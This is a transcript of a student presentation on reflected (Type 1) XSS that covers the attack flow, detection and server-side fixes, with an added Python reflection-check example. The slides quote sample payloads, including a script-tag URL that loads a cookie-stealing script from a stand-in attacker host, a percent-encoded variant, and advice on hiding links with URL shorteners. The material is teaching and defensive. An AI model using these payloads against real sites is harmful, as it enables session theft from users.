CSCE 548 Student Presentation Ryan Labrador

Presentation transcript:

XSS (Type 1) CSCE 548 Student Presentation Ryan Labrador

Technical Overview: Reflected XSS / Non-Persistent XSS. Most frequent type of XSS. [1] A simple XSS attack involves three parties: the website, the victim and the attacker. The Type 1 XSS vulnerability is also known as Reflected XSS because the user input is immediately returned (or reflected) back to the user by the web application in some form of response (e.g. error message, search result). Type 1 XSS is also known as Non-persistent XSS because the injected attack is not saved on the server or within the web application. [1] https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Technical Overview
1. The attacker finds a vulnerable website.
2. The attacker crafts a malicious URL exploiting the vulnerability.
3. Through social engineering, the attacker convinces the victim to click the malicious URL.
4. The website sends the unvalidated input from the request back to the victim.
5. The malicious code is executed by the victim's browser.
Websites vulnerable to Type 1 XSS attacks, as previously stated, return the user input without it being made safe to render in the browser.

Technical Overview: The key to pulling off a successful XSS attack is social engineering, i.e. making the link look safe: http://google.com?q=<script%20type='text/javascript'>alert('xss');</script> vs. http://tinyurl.com/5bseqw Social engineering, convincing someone to click the link, is the hardest part. To accomplish this, the attacker can either make the link appear harmless by keeping the same familiar name or cover up the URL completely using a URL-shortening service (like tinyURL or Google).

Example [3] Three actors: Bob, Alice, and Mallory. Bob hosts a website that sells goods. Alice has an account on Bob's website and buys from there frequently. When Alice is logged in, her browser keeps an Authorization Cookie so both she (the client) and the server remember she's logged in. [3] https://en.wikipedia.org/wiki/Cross-site_scripting

Example [3] Mallory discovers that Bob's website has an XSS (type 1) vulnerability. While using the search page, she searches for puppies. Since Bob's site doesn't sell puppies, the following page displays "puppies not found." The URL looks like: http://bobssite.org?q=puppies This is normal behavior. [3] https://en.wikipedia.org/wiki/Cross-site_scripting

Example [3] Mallory uses a script as a search term to confirm her findings: <script type='text/javascript'>alert('xss');</script> This results in a page that displays: "<script type='text/javascript'>alert('xss');</script> not found" as well as an alert box that says "xss." The URL is: http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script> This is exploitable behavior. [3] https://en.wikipedia.org/wiki/Cross-site_scripting

Example [3] Mallory makes a URL to exploit the vulnerability: http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script> In order to better hide the script, Mallory percent-encodes the ASCII characters into hexadecimal format: http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E She sends an e-mail to members of Bob's site, saying "Check out some cute puppies!" [3] https://en.wikipedia.org/wiki/Cross-site_scripting

Example [3] Alice gets the email. Alice loves puppies, so she clicks on the link. The link takes her to Bob's site and searches for puppies. Since the search comes up empty, it displays "puppies not found" while the script tag runs quietly in the background. Mallory's script loads and runs a program, authstealer.js. Authstealer.js takes a copy of Alice's Authorization Cookie, and now Mallory can log in appearing to be Alice! [3] https://en.wikipedia.org/wiki/Cross-site_scripting

Detection Methods (Overview) The simplest way to test for XSS vulnerabilities (given by the book) is to make a request using malicious code for all the possible input parameters. [2] If any data you entered gets returned in the raw HTML byte stream, you may have XSS issues in your code. [2] 24 Deadly Sins of Software Security

Detection Methods (In-depth): Black Box Testing [1] OWASP.org has a three-phase black-box test that will help detect common XSS (type 1) vulnerabilities.
1. Detect input vectors, e.g. HTTP parameters, POST data, hidden form field values, predefined radio or selection values.
2. Analyze each input vector to detect potential vulnerabilities: add harmless input data to trigger responses alerting the tester of a possible vulnerability.
3. Analyze the result and determine if the vulnerability has a realistic impact on the web application's security. Any test input found in the returned web page should have all special characters properly encoded, replaced, or filtered out.
[1] https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Avoidance of Error: Server vs. Client
Server: Sanitize search input (whitelist/blacklist); redirect invalid requests.
Client: Be aware of what you're doing and what you're clicking on.
HTML sanitization: the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe" and desired.
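The following is an added example (not part of the presentation) that models Bob's search page from the slides in Python and applies the detection check from the slides above: for each special character, send it with a harmless marker and see whether it comes back in the raw HTML. The three render functions (vulnerable, tag-blacklist, output-encoded) and the marker token are constructed for illustration; the encoded version uses Python's html.escape.

```python
import html
from urllib.parse import quote, unquote


def query_param(url: str) -> str:
    """Pull the 'q' parameter out of a URL the way the search page would."""
    query = url.split("?", 1)[1] if "?" in url else ""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "q":
            return unquote(value)
    return ""


def render_search_vulnerable(q: str) -> str:
    # Type 1 flaw: the raw query is reflected straight into the HTML response.
    return f"<p>{q} not found</p>"


def render_search_blacklist(q: str) -> str:
    # Blacklist attempt: strips one tag name but leaves every other
    # special character, so the input is still reflected unencoded.
    return f"<p>{q.replace('<script', '')} not found</p>"


def render_search_encoded(q: str) -> str:
    # Fix: output-encode so <, >, ", ' and & become entities the
    # browser renders as text rather than markup.
    return f"<p>{html.escape(q, quote=True)} not found</p>"


PROBE_CHARS = '<>"\'&'
MARKER = "zz9xss"  # constructed token so the probe is easy to find in the response


def unencoded_reflections(render) -> set:
    """OWASP phase 2/3 style check: send each special character with a
    harmless marker through the request URL and report which characters
    come back in the HTML byte stream unencoded (empty set = safe)."""
    raw = set()
    for c in PROBE_CHARS:
        url = "http://bobssite.org?q=" + quote(c + MARKER, safe="")
        page = render(query_param(url))
        if c + MARKER in page:
            raw.add(c)
    return raw


if __name__ == "__main__":
    for fn in (render_search_vulnerable, render_search_blacklist, render_search_encoded):
        print(fn.__name__, "reflects raw:", sorted(unencoded_reflections(fn)))
```

The blacklist version reports the same raw characters as the vulnerable one, which is why output encoding (or whitelist sanitization) rather than tag-name filtering is the recommended server-side fix.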

References
[1] https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)
[2] 24 Deadly Sins of Software Security
[3] https://en.wikipedia.org/wiki/Cross-site_scripting
http://www.acunetix.com/websitesecurity/cross-site-scripting/